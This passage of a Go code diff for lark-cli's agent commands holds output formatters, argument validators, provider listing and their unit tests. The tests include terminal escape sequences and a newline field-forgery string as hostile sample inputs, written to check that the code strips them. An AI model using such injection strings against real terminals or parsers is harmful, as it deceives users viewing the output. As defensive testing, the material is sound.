fmt.Fprintf(w, "task_id: %s\n", kvValue(task.TaskID))
if task.ContextID != "" {
fmt.Fprintf(w, "context_id: %s\n", kvValue(task.ContextID))
}
if text := firstTextOf(task); text != "" {
fmt.Fprintf(w, "text: %s\n", truncateRunes(kvValue(text), 120))
}
fmt.Fprintf(w, "artifacts: %d\n", len(task.Artifacts))
}
// TSV renderers below intentionally do not escape tab/newline in cell values:
// a value containing them breaks the column layout. The agent's primary
// consumption surface is json; pretty is for human inspection only, so leaving
// them unescaped is acceptable.
// printTaskSummariesTSV renders the list-class pretty view for tasks:
// a header row naming the json fields, then one row per task.
func printTaskSummariesTSV(w io.Writer, tasks []iagent.TaskSummary) {
fmt.Fprintf(w, "TASK_ID\tCONTEXT_ID\tSTATE\tIS_TERMINAL\n")
for _, t := range tasks {
fmt.Fprintf(w, "%s\t%s\t%s\t%t\n", stripANSI(t.TaskID), stripANSI(t.ContextID), t.State, t.IsTerminal)
}
}
// printContextsTSV renders the list-class pretty view for contexts. The
// Title is agent-controlled and must be ANSI-stripped.
func printContextsTSV(w io.Writer, contexts []iagent.ContextSummary) {
fmt.Fprintf(w, "CONTEXT_ID\tCREATED_AT\tTITLE\n")
for _, c := range contexts {
fmt.Fprintf(w, "%s\t%s\t%s\n", stripANSI(c.ContextID), c.CreatedAt, stripANSI(c.Title))
}
}
// printContextDetailPretty renders `context get --format pretty` as key: value
// lines with the tasks count; the agent-controlled Title (and the id) go
// through kvValue so they cannot forge adjacent field rows.
func printContextDetailPretty(w io.Writer, detail *iagent.ContextDetail) {
if detail == nil {
fmt.Fprintln(w, "(no context)")
return
}
fmt.Fprintf(w, "context_id: %s\n", kvValue(detail.ContextID))
if detail.CreatedAt != "" {
fmt.Fprintf(w, "created_at: %s\n", detail.CreatedAt)
}
if detail.Title != "" {
fmt.Fprintf(w, "title: %s\n", kvValue(detail.Title))
}
fmt.Fprintf(w, "tasks: %d\n", len(detail.Tasks))
}
// usageHintOf builds the "用法: <command path> <positional shape>" hint from
// the executing command's Use line, so the hint never drifts from the
// registered Use string.
func usageHintOf(cmd *cobra.Command) string {
if _, shape, ok := strings.Cut(cmd.Use, " "); ok {
return fmt.Sprintf("用法: %s %s", cmd.CommandPath(), shape)
}
return "用法: " + cmd.CommandPath()
}
// exactArgsWithUsage is cobra.ExactArgs wrapped into a typed validation error
// (exit 2) whose hint carries the full usage string — cobra's bare English
// "accepts 2 arg(s), received 1" never says WHAT is missing.
func exactArgsWithUsage(n int) cobra.PositionalArgs {
return func(cmd *cobra.Command, args []string) error {
if len(args) != n {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"需要 %d 个位置参数,收到 %d 个", n, len(args)).
WithHint("%s", usageHintOf(cmd))
}
return nil
}
}
// maximumArgsWithUsage is the cobra.MaximumNArgs counterpart of
// exactArgsWithUsage, for leaves with an optional positional (agent list).
func maximumArgsWithUsage(n int) cobra.PositionalArgs {
return func(cmd *cobra.Command, args []string) error {
if len(args) > n {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"最多接受 %d 个位置参数,收到 %d 个", n, len(args)).
WithHint("%s", usageHintOf(cmd))
}
return nil
}
}

352
cmd/agent/format_test.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"bytes"
"encoding/json"
"errors"
"strings"
"testing"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/output"
)
// TestValidateFormat_Valid pins that json/pretty (and the zero value, which
// only occurs when options structs are built directly in tests) pass.
func TestValidateFormat_Valid(t *testing.T) {
for _, f := range []string{"", "json", "pretty"} {
if err := validateFormat(f); err != nil {
t.Errorf("format %q should be valid: %v", f, err)
}
}
}
// TestValidateFormat_Invalid pins that a --format outside json|pretty is a
// validation/invalid_argument error (exit 2) whose hint lists the legal values
// and whose param names the flag with the -- prefix.
func TestValidateFormat_Invalid(t *testing.T) {
err := validateFormat("yaml")
if err == nil {
t.Fatal("--format yaml should error (currently silently treated as json)")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T", err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
if output.ExitCodeOf(err) != output.ExitValidation {
t.Fatalf("exit should be 2, got %d", output.ExitCodeOf(err))
}
if !strings.Contains(p.Hint, "json | pretty") {
t.Errorf("hint should list the legal values json | pretty, got %q", p.Hint)
}
var verr *errs.ValidationError
if !errors.As(err, &verr) || verr.Param != "--format" {
t.Errorf("param should be --format, got %+v", verr)
}
}
// agentRootTree builds `lark-cli agent ...` as production wires it (root Use
// lark-cli), with a nil Factory: format validation must fire at the RunE
// entry, before any Factory access.
func agentRootTree() *cobra.Command {
root := &cobra.Command{Use: "lark-cli", SilenceUsage: true, SilenceErrors: true}
root.AddCommand(NewCmdAgent(nil))
return root
}
// TestFormatYamlRejectedAcrossLeaves pins that EVERY leaf of the agent tree
// consumes validateFormat: `--format yaml` is exit 2 with the json|pretty
// hint, uniformly, before any provider/Factory is touched.
func TestFormatYamlRejectedAcrossLeaves(t *testing.T) {
leaves := [][]string{
{"agent", "list", "--format", "yaml"},
{"agent", "card", "example:x", "--format", "yaml"},
{"agent", "send", "example:x", "--text", "hi", "--format", "yaml"},
{"agent", "task", "get", "example:x", "t1", "--format", "yaml"},
{"agent", "task", "list", "example:x", "--format", "yaml"},
{"agent", "task", "cancel", "example:x", "t1", "--format", "yaml"},
{"agent", "context", "list", "example:x", "--format", "yaml"},
{"agent", "context", "get", "example:x", "c1", "--format", "yaml"},
{"agent", "context", "delete", "example:x", "c1", "--yes", "--format", "yaml"},
}
for _, argv := range leaves {
t.Run(strings.Join(argv[:len(argv)-2], " "), func(t *testing.T) {
root := agentRootTree()
root.SetOut(&bytes.Buffer{})
root.SetErr(&bytes.Buffer{})
root.SetArgs(argv)
err := root.Execute()
if err == nil {
t.Fatalf("%v should report a --format validation error", argv)
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T: %v", err, err)
}
if output.ExitCodeOf(err) != output.ExitValidation {
t.Fatalf("exit should be 2, got %d", output.ExitCodeOf(err))
}
p, ok := errs.ProblemOf(err)
if !ok || !strings.Contains(p.Hint, "json | pretty") {
t.Errorf("hint should contain json | pretty, got %+v", p)
}
})
}
}
// TestFormatHelpTextUniform pins the mandated uniform help text
// "output format: json (default) | pretty" across every leaf that has --format.
func TestFormatHelpTextUniform(t *testing.T) {
cmds := map[string]*cobra.Command{
"list": NewCmdAgentList(nil),
"card": NewCmdAgentCard(nil),
"send": NewCmdAgentSend(nil, nil),
"task get": NewCmdAgentTaskGet(nil),
"task list": NewCmdAgentTaskList(nil),
"task cancel": NewCmdAgentTaskCancel(nil),
"context list": NewCmdAgentContextList(nil),
"context get": NewCmdAgentContextGet(nil),
"context delete": NewCmdAgentContextDelete(nil),
}
for name, cmd := range cmds {
fl := cmd.Flags().Lookup("format")
if fl == nil {
t.Errorf("%s should have a --format flag", name)
continue
}
if fl.DefValue != "json" {
t.Errorf("%s --format default should be json, got %q", name, fl.DefValue)
}
if fl.Usage != "output format: json (default) | pretty" {
t.Errorf("%s --format help should be uniform, got %q", name, fl.Usage)
}
}
}
// TestStripANSI pins that CSI sequences, OSC sequences and bare ESC bytes are
// all removed before agent text reaches a terminal.
func TestStripANSI(t *testing.T) {
for _, tt := range []struct{ in, want string }{
{"before\x1b[31mred\x1b[0mafter", "beforeredafter"},
{"a\x1bb", "ab"}, // bare ESC
{"t\x1b]0;evil\x07x", "tx"},
{"clean 文本", "clean 文本"},
} {
if got := stripANSI(tt.in); got != tt.want {
t.Errorf("stripANSI(%q) = %q, want %q", tt.in, got, tt.want)
}
}
}
// TestPrintTaskPretty pins the task-class pretty spec: line-per-field
// key: value with state / task_id / context_id / first text message truncated
// to 120 runes / artifacts count — and the agent-controlled text stripped of
// ANSI escapes.
func TestPrintTaskPretty(t *testing.T) {
long := strings.Repeat("字", 130)
task := &iagent.AgentTask{
TaskID: "chat_1",
ContextID: "sess_1",
State: iagent.StateCompleted,
Messages: []iagent.Message{{
Role: "agent",
Parts: []iagent.Part{{Type: "text", Text: "\x1b[31m" + long + "\x1b[0m"}},
}},
Artifacts: []iagent.Artifact{{ID: "a1"}, {ID: "a2"}},
}
out := &bytes.Buffer{}
printTaskPretty(out, task)
text := out.String()
for _, want := range []string{"state: completed", "task_id: chat_1", "context_id: sess_1", "artifacts: 2"} {
if !strings.Contains(text, want) {
t.Errorf("pretty output should contain %q, got:\n%s", want, text)
}
}
if strings.Contains(text, "\x1b") {
t.Errorf("ANSI sequences in agent body text must be stripped: %q", text)
}
if strings.Contains(text, long) {
t.Errorf("body should be truncated to 120 chars, the full 130-char body should not appear")
}
if !strings.Contains(text, strings.Repeat("字", 120)) {
t.Errorf("body should keep the first 120 chars, got:\n%s", text)
}
var env output.Envelope
if json.Unmarshal(out.Bytes(), &env) == nil && env.OK {
t.Errorf("pretty should not be a JSON envelope: %s", text)
}
}
// TestPrintTaskPretty_NewlineForgeryNeutralized pins the key:value forgery
// fix: agent text containing newlines must not be able to fake an adjacent
// field row ("done\nstate: completed") — \n/\t in single-line values collapse
// to spaces, so exactly one state: line exists.
func TestPrintTaskPretty_NewlineForgeryNeutralized(t *testing.T) {
task := &iagent.AgentTask{
TaskID: "chat_1",
State: iagent.StateFailed,
Messages: []iagent.Message{{
Role: "agent",
Parts: []iagent.Part{{Type: "text", Text: "done\nstate: completed\tok"}},
}},
}
out := &bytes.Buffer{}
printTaskPretty(out, task)
var stateLines int
for _, line := range strings.Split(out.String(), "\n") {
if strings.HasPrefix(line, "state: ") {
stateLines++
}
}
if stateLines != 1 {
t.Fatalf("body newlines must not forge an adjacent field row; there should be exactly 1 state: line, got %d:\n%s", stateLines, out.String())
}
if !strings.Contains(out.String(), "state: failed") {
t.Errorf("the real state line should remain, got:\n%s", out.String())
}
if !strings.Contains(out.String(), "text: done state: completed ok") {
t.Errorf("\\n/\\t in the body should be replaced by spaces, got:\n%s", out.String())
}
}
// TestPrintContextDetailPretty_NewlineForgeryNeutralized pins the same fix on
// the context title row.
func TestPrintContextDetailPretty_NewlineForgeryNeutralized(t *testing.T) {
out := &bytes.Buffer{}
printContextDetailPretty(out, &iagent.ContextDetail{
ContextID: "sess_1",
Title: "标题\ncontext_id: forged",
})
var idLines int
for _, line := range strings.Split(out.String(), "\n") {
if strings.HasPrefix(line, "context_id: ") {
idLines++
}
}
if idLines != 1 {
t.Fatalf("title newlines must not forge a context_id row; there should be exactly 1 line, got %d:\n%s", idLines, out.String())
}
}
// TestPrintTaskPretty_NilTask pins the nil degradation (no panic).
func TestPrintTaskPretty_NilTask(t *testing.T) {
out := &bytes.Buffer{}
printTaskPretty(out, nil)
if out.Len() == 0 {
t.Error("nil task should print a placeholder line")
}
}
// TestPrintTaskSummariesTSV pins the list-class pretty spec: a header row
// naming the json fields, then one tab-separated row per task.
func TestPrintTaskSummariesTSV(t *testing.T) {
out := &bytes.Buffer{}
printTaskSummariesTSV(out, []iagent.TaskSummary{
{TaskID: "chat_1", ContextID: "sess_1", State: iagent.StateCompleted, IsTerminal: true},
})
lines := strings.Split(strings.TrimSpace(out.String()), "\n")
if len(lines) != 2 {
t.Fatalf("should have a header + 1 data row, got %q", out.String())
}
if lines[0] != "TASK_ID\tCONTEXT_ID\tSTATE\tIS_TERMINAL" {
t.Errorf("header columns should match the json field names, got %q", lines[0])
}
if lines[1] != "chat_1\tsess_1\tcompleted\ttrue" {
t.Errorf("data row mismatch, got %q", lines[1])
}
}
// TestPrintContextsTSV pins the context-list pretty spec: header row plus
// rows, with the agent-controlled Title stripped of ANSI escapes (Task 10
// review fix).
func TestPrintContextsTSV(t *testing.T) {
out := &bytes.Buffer{}
printContextsTSV(out, []iagent.ContextSummary{
{ContextID: "sess_1", CreatedAt: "2026-07-05T10:00:00+08:00", Title: "\x1b[2J销售分析"},
})
text := out.String()
if !strings.HasPrefix(text, "CONTEXT_ID\tCREATED_AT\tTITLE\n") {
t.Errorf("should have a header row, got %q", text)
}
if !strings.Contains(text, "销售分析") {
t.Errorf("should contain the title text, got %q", text)
}
if strings.Contains(text, "\x1b") {
t.Errorf("ANSI sequences in Title must be stripped: %q", text)
}
}
// TestPrintContextDetailPretty pins the context-get pretty rendering:
// key: value lines with the tasks count, title ANSI-stripped.
func TestPrintContextDetailPretty(t *testing.T) {
out := &bytes.Buffer{}
printContextDetailPretty(out, &iagent.ContextDetail{
ContextID: "sess_1",
CreatedAt: "2026-07-05T10:00:00+08:00",
Title: "\x1b[31m分析\x1b[0m",
Tasks: []iagent.TaskSummary{{TaskID: "chat_1"}},
})
text := out.String()
for _, want := range []string{"context_id: sess_1", "title: 分析", "tasks: 1"} {
if !strings.Contains(text, want) {
t.Errorf("pretty output should contain %q, got:\n%s", want, text)
}
}
if strings.Contains(text, "\x1b") {
t.Errorf("ANSI sequences in title must be stripped: %q", text)
}
}
// TestExactArgsUsageHint pins that an arg-count error carries a usage hint
// built from the real command path + Use shape, so the caller learns what is
// missing instead of cobra's bare "accepts 2 arg(s)".
func TestExactArgsUsageHint(t *testing.T) {
root := agentRootTree()
root.SetOut(&bytes.Buffer{})
root.SetErr(&bytes.Buffer{})
root.SetArgs([]string{"agent", "task", "get", "example:x"}) // missing task-id
err := root.Execute()
if err == nil {
t.Fatal("task get with a single argument should error")
}
if !errs.IsValidation(err) {
t.Fatalf("an arg-count error should be a validation type, got %T: %v", err, err)
}
p, ok := errs.ProblemOf(err)
if !ok || !strings.Contains(p.Hint, "用法: lark-cli agent task get <agent_ref> <task-id>") {
t.Fatalf("hint should contain the usage string, got %+v", p)
}
if output.ExitCodeOf(err) != output.ExitValidation {
t.Fatalf("exit should be 2, got %d", output.ExitCodeOf(err))
}
}
// TestMaximumArgsUsageHint pins the same treatment for the MaximumNArgs leaf
// (`agent list [scheme]`).
func TestMaximumArgsUsageHint(t *testing.T) {
root := agentRootTree()
root.SetOut(&bytes.Buffer{})
root.SetErr(&bytes.Buffer{})
root.SetArgs([]string{"agent", "list", "example", "extra"})
err := root.Execute()
if err == nil {
t.Fatal("list with more than 1 positional argument should error")
}
if !errs.IsValidation(err) {
t.Fatalf("an arg-count error should be a validation type, got %T: %v", err, err)
}
p, ok := errs.ProblemOf(err)
if !ok || !strings.Contains(p.Hint, "用法: lark-cli agent list [scheme]") {
t.Fatalf("hint should contain the usage string, got %+v", p)
}
}

199
cmd/agent/list.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"fmt"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/output"
)
// providerInfo describes a registered provider adapter in `agent list` output.
// Every field is sourced from the registered iagent.ProviderInfo (the single
// source of truth).
type providerInfo struct {
Scheme string `json:"scheme"`
Label string `json:"label"`
AgentRefFormat string `json:"agent_ref_format"`
Kind string `json:"kind"`
AgentIDSource string `json:"agent_id_source"`
}
// listOptions holds all inputs for `agent list [scheme]`.
type listOptions struct {
Factory *cmdutil.Factory
Cmd *cobra.Command
Scheme string
Format string
}
// NewCmdAgentList builds `agent list [scheme]`. Without an argument it
// enumerates the registered provider adapters with their metadata — a
// pure, API-free listing. With a scheme it performs second-level discovery:
// providers implementing Discoverer enumerate their agents;
// others return unsupported_capability with the agent_id_source
// guidance. Risk=read.
func NewCmdAgentList(f *cmdutil.Factory) *cobra.Command {
opts := &listOptions{Factory: f}
cmd := &cobra.Command{
Use: "list [scheme]",
Short: "List registered agent providers, or enumerate the agents under one provider",
Long: "With no argument, list the built-in provider adapters and their metadata (label / agent_ref format / kind / how to obtain an agent_id) without calling any API. With a scheme, enumerate the agents under that provider (catalog providers must be enumerable; instance providers may not support it).",
Args: maximumArgsWithUsage(1),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
if len(args) == 1 {
opts.Scheme = args[0]
}
return agentListRun(opts)
},
}
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// agentListRun dispatches `agent list [scheme]`: with a scheme it lists that
// provider's agents (second-level discovery); without it renders the provider
// listing. JSON envelope is the default; `pretty` is the opt-in human view.
func agentListRun(opts *listOptions) error {
if opts.Scheme != "" {
return agentListSchemeRun(opts)
}
f := opts.Factory
providers := listProviders()
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
fmt.Fprintf(f.IOStreams.Out, "SCHEME\tLABEL\tAGENT_REF_FORMAT\tKIND\n")
for _, p := range providers {
fmt.Fprintf(f.IOStreams.Out, "%s\t%s\t%s\t%s\n", p.Scheme, p.Label, p.AgentRefFormat, p.Kind)
}
// agent_id_source is a full sentence — a TSV column would blow out the
// row width, so surface it as a per-provider footer instead. This is the
// single most important "where do I get an agent_id" cue for newcomers
// and must not vanish in the human-readable view.
fmt.Fprintln(f.IOStreams.Out)
for _, p := range providers {
fmt.Fprintf(f.IOStreams.Out, "agent_id 获取(%s: %s\n", p.Scheme, p.AgentIDSource)
}
return nil
}
env := output.Envelope{
OK: true,
Data: map[string]interface{}{"providers": providers},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// agentListSchemeRun runs `agent list <scheme>`: second-level discovery for one
// provider. The Discoverer probe runs BEFORE any client construction so a
// provider without discovery support returns its precise
// unsupported_capability error even in an unconfigured environment — aligned
// with the validation-before-config-gate principle. Only a provider that
// does implement Discoverer needs a configured client for the real ListAgents
// call.
func agentListSchemeRun(opts *listOptions) error {
f := opts.Factory
info, ok := iagent.Info(opts.Scheme)
if !ok {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 agent provider '%s',当前支持: %s",
opts.Scheme, iagent.KnownSchemes()).
WithHint("用 lark-cli agent list 查看可用 provider")
}
if !probeDiscoverer(info) {
return errs.NewValidationError(errs.SubtypeUnsupportedCapability,
"provider '%s' 暂不支持列举 agent", opts.Scheme).
WithHint("%s", info.AgentIDSource)
}
// The real ListAgents call carries the resolved identity, aligned with
// resolveProvider (common.go) — a provider must never see a zero As on an
// API-bound instance.
id := f.ResolveAs(opts.Cmd.Context(), opts.Cmd, "")
apiClient, err := f.NewAPIClient()
if err != nil {
return err
}
p, err := info.Factory(iagent.Deps{Client: apiClient, As: id}, "")
if err != nil {
return errs.NewValidationError(errs.SubtypeInvalidArgument, "%s", err.Error()).WithCause(err)
}
agents, err := p.ListAgents(opts.Cmd.Context())
if err != nil {
return err
}
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
// Name/Description are agent-controlled remote strings — ANSI-strip
// them before writing to the terminal.
fmt.Fprintf(f.IOStreams.Out, "AGENT_REF\tNAME\tDESCRIPTION\n")
for _, a := range agents {
fmt.Fprintf(f.IOStreams.Out, "%s\t%s\t%s\n", stripANSI(a.AgentRef), stripANSI(a.Name), stripANSI(a.Description))
}
return nil
}
env := output.Envelope{
OK: true,
Data: map[string]interface{}{"agents": agents},
Meta: &output.Meta{Count: len(agents)},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// probeDiscoverer reports whether the provider built by info can enumerate its
// agents (wires ListAgents). The probe instance is constructed with empty Deps
// and an empty agentID — no client is needed to read a field, which keeps the
// probe usable before config init. A factory error means the capability cannot
// be confirmed, so it degrades to not discoverable.
func probeDiscoverer(info iagent.ProviderInfo) bool {
p, err := info.Factory(iagent.Deps{}, "")
if err != nil || p == nil {
return false
}
return p.ListAgents != nil
}
// listProviders builds the provider descriptors from the built-in registry so
// the listing stays in sync with whatever adapters are registered.
func listProviders() []providerInfo {
schemes := iagent.RegisteredSchemes()
out := make([]providerInfo, 0, len(schemes))
for _, s := range schemes {
// s comes from RegisteredSchemes, so Info always succeeds.
info, _ := iagent.Info(s)
out = append(out, providerInfo{
Scheme: s,
Label: info.Label,
AgentRefFormat: info.AgentRefFormat,
Kind: string(info.Kind),
AgentIDSource: info.AgentIDSource,
})
}
return out
}

428
cmd/agent/list_test.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"bytes"
"context"
"encoding/json"
"strings"
"testing"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
// listFactory returns a Factory writing to a fresh stdout buffer plus a
// listOptions bound to it, ready to drive agentListRun without any API.
func listFactory() (*listOptions, *bytes.Buffer) {
out := &bytes.Buffer{}
errOut := &bytes.Buffer{}
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: errOut}}
return &listOptions{Factory: f, Format: "json"}, out
}
// decodeProviders unmarshals the envelope on out and returns data.providers.
func decodeProviders(t *testing.T, out *bytes.Buffer) []interface{} {
t.Helper()
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, out.String())
}
data, _ := env.Data.(map[string]interface{})
providers, _ := data["providers"].([]interface{})
return providers
}
// findProvider returns the provider entry whose scheme matches, or nil.
func findProvider(providers []interface{}, scheme string) map[string]interface{} {
for _, pv := range providers {
p, _ := pv.(map[string]interface{})
if p["scheme"] == scheme {
return p
}
}
return nil
}
// TestAgentListRun_ProviderFieldsV2 pins the provider entry contract: the
// example entry carries all fields sourced from iagent.Info (the single source
// of truth), the legacy free-text description field is gone, and discoverable
// is no longer exposed.
func TestAgentListRun_ProviderFieldsV2(t *testing.T) {
opts, out := listFactory()
if err := agentListRun(opts); err != nil {
t.Fatalf("list should not error: %v", err)
}
info, ok := iagent.Info("example")
if !ok {
t.Fatal("the example provider should already be registered (blank import in agent.go)")
}
p := findProvider(decodeProviders(t, out), "example")
if p == nil {
t.Fatalf("list should include the example provider: %s", out.String())
}
if p["label"] != info.Label {
t.Errorf("label should come from ProviderInfo.Label %q, got %v", info.Label, p["label"])
}
if p["agent_ref_format"] != info.AgentRefFormat {
t.Errorf("agent_ref_format should come from ProviderInfo.AgentRefFormat %q, got %v", info.AgentRefFormat, p["agent_ref_format"])
}
if p["kind"] != string(info.Kind) {
t.Errorf("kind should come from ProviderInfo.Kind %q, got %v", info.Kind, p["kind"])
}
if p["agent_id_source"] != info.AgentIDSource {
t.Errorf("agent_id_source should come from ProviderInfo.AgentIDSource, got %v", p["agent_id_source"])
}
if _, present := p["description"]; present {
t.Errorf("the old description field should be removed (double-source with label), got %v", p)
}
if _, present := p["discoverable"]; present {
t.Errorf("the discoverable field should be removed from the provider list, got %v", p["discoverable"])
}
}
// TestAgentListRun_EnvelopeShape verifies the JSON envelope carries
// data.providers[] with the full field contract.
func TestAgentListRun_EnvelopeShape(t *testing.T) {
opts, out := listFactory()
if err := agentListRun(opts); err != nil {
t.Fatalf("list should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, out.String())
}
if !env.OK {
t.Errorf("ok should be true: %+v", env)
}
providers := decodeProviders(t, out)
if len(providers) == 0 {
t.Fatalf("data.providers should be a non-empty array: %s", out.String())
}
first, ok := providers[0].(map[string]interface{})
if !ok {
t.Fatalf("provider entry should be an object, got %T", providers[0])
}
for _, key := range []string{"scheme", "label", "agent_ref_format", "kind", "agent_id_source"} {
if _, present := first[key]; !present {
t.Errorf("provider entry missing field %q: %v", key, first)
}
}
if _, present := first["discoverable"]; present {
t.Errorf("provider entry should not contain a discoverable field: %v", first)
}
}
// TestAgentListDefaultFormatIsJSON pins the default flip: `agent list`
// without --format emits the JSON envelope (pretty is opt-in).
func TestAgentListDefaultFormatIsJSON(t *testing.T) {
out := &bytes.Buffer{}
errOut := &bytes.Buffer{}
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: errOut}}
cmd := NewCmdAgentList(f)
cmd.SetOut(&bytes.Buffer{})
cmd.SetErr(&bytes.Buffer{})
cmd.SetArgs([]string{})
if err := cmd.Execute(); err != nil {
t.Fatalf("agent list should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("default output should be a JSON envelope: %v (%s)", err, out.String())
}
if !env.OK {
t.Errorf("ok should be true: %+v", env)
}
}
// TestAgentListRun_PrettyFormat pins the opt-in --format pretty branch: a header
// row plus tab-separated provider lines, not a JSON envelope.
func TestAgentListRun_PrettyFormat(t *testing.T) {
out := &bytes.Buffer{}
errOut := &bytes.Buffer{}
f := &cmdutil.Factory{IOStreams: &cmdutil.IOStreams{Out: out, ErrOut: errOut}}
opts := &listOptions{Factory: f, Format: "pretty"}
if err := agentListRun(opts); err != nil {
t.Fatalf("list pretty should not error: %v", err)
}
text := out.String()
// A pretty rendering is human text, not a JSON envelope.
var env output.Envelope
if json.Unmarshal(out.Bytes(), &env) == nil && env.OK {
t.Fatalf("pretty format should not output a JSON envelope: %s", text)
}
if !strings.HasPrefix(text, "SCHEME") {
t.Errorf("pretty output should start with a header row: %s", text)
}
if !strings.Contains(text, "example") {
t.Errorf("pretty output should contain the example provider: %s", text)
}
if !strings.Contains(text, "example:<agent_id>") {
t.Errorf("pretty output should contain the example ref format: %s", text)
}
// agent_id_source is surfaced as a footer (not a column) so the newcomer's
// "where do I get an agent_id" cue does not disappear in the pretty view.
if !strings.Contains(text, "agent_id 获取") {
t.Errorf("pretty output should contain the agent_id_source footer hint: %s", text)
}
}
// TestAgentListScheme_UnsupportedCapability pins that `agent list fakeflow`
// on a provider without Discoverer is unsupported_capability (exit 2) with the
// AgentIDSource text as hint, and — because the probe runs before any client
// construction — works on an unconfigured Factory.
func TestAgentListScheme_UnsupportedCapability(t *testing.T) {
registerScripted()
opts, _ := listFactory()
opts.Scheme = "fakeflow"
err := agentListRun(opts)
if err == nil {
t.Fatal("fakeflow does not implement Discoverer, so list fakeflow should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T (%v)", err, err)
}
if code := output.ExitCodeOf(err); code != output.ExitValidation {
t.Fatalf("exit code should be 2, got %d", code)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.Subtype("unsupported_capability") {
t.Fatalf("subtype should be unsupported_capability, got %+v", p)
}
if !strings.Contains(err.Error(), "provider 'fakeflow' 暂不支持列举 agent") {
t.Errorf("message should state that listing is not supported, got %q", err.Error())
}
if !strings.Contains(p.Hint, fakeflowAgentIDSource) {
t.Errorf("hint should be the AgentIDSource text, got %q", p.Hint)
}
}
// TestAgentListScheme_UnknownScheme pins that an unregistered scheme is
// invalid_argument and the message lists the registered schemes.
func TestAgentListScheme_UnknownScheme(t *testing.T) {
opts, _ := listFactory()
opts.Scheme = "nosuch"
err := agentListRun(opts)
if err == nil {
t.Fatal("an unknown scheme should error")
}
if !errs.IsValidation(err) {
t.Fatalf("should be a validation error, got %T (%v)", err, err)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %+v", p)
}
if !strings.Contains(err.Error(), "nosuch") || !strings.Contains(err.Error(), "example") {
t.Errorf("message should contain the unknown scheme and the registered scheme list, got %q", err.Error())
}
// Hand-written validation errors carry a recovery hint pointing at
// `agent list` for provider discovery.
if !strings.Contains(p.Hint, "agent list") {
t.Errorf("unknown-scheme hint should point to `agent list`, got %q", p.Hint)
}
}
// stubCore wires the mandatory core fields onto a test *Provider; the list
// tests never dispatch Send/GetTask (they only exercise ListAgents), but
// Register requires both non-nil.
func stubCore(p *iagent.Provider) *iagent.Provider {
p.Send = func(ctx context.Context, in iagent.SendInput) (*iagent.AgentTask, error) { return nil, nil }
p.GetTask = func(ctx context.Context, taskID string) (*iagent.AgentTask, error) { return nil, nil }
return p
}
// newFakeDisc is a test-only enumerable provider (wires ListAgents), to pin the
// `agent list <scheme>` positive path without a real catalog provider.
func newFakeDisc() *iagent.Provider {
return stubCore(&iagent.Provider{
ListAgents: func(ctx context.Context) ([]iagent.AgentSummary, error) {
return []iagent.AgentSummary{
{AgentRef: "fakedisc:a1", Name: "Agent One", Description: "第一个"},
{AgentRef: "fakedisc:a2", Name: "Agent Two"},
}, nil
},
})
}
// registerFakeDisc registers the fakedisc scheme. Like fakepause in
// send_test.go this leaks into the package-level registry for the remaining
// tests of this package run — so no test in this package may assert an exact
// provider set or provider count.
func registerFakeDisc() {
iagent.Register("fakedisc", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) { return newFakeDisc(), nil },
Label: "test fake (discoverer)",
AgentRefFormat: "fakedisc:<agent_id>",
AgentIDSource: "test only",
Kind: iagent.KindCatalog,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}},
})
}
// TestAgentListScheme_DiscovererListsAgents pins the positive path: a
// provider implementing Discoverer yields {agents:[AgentSummary...]} plus
// meta.count.
func TestAgentListScheme_DiscovererListsAgents(t *testing.T) {
registerFakeDisc()
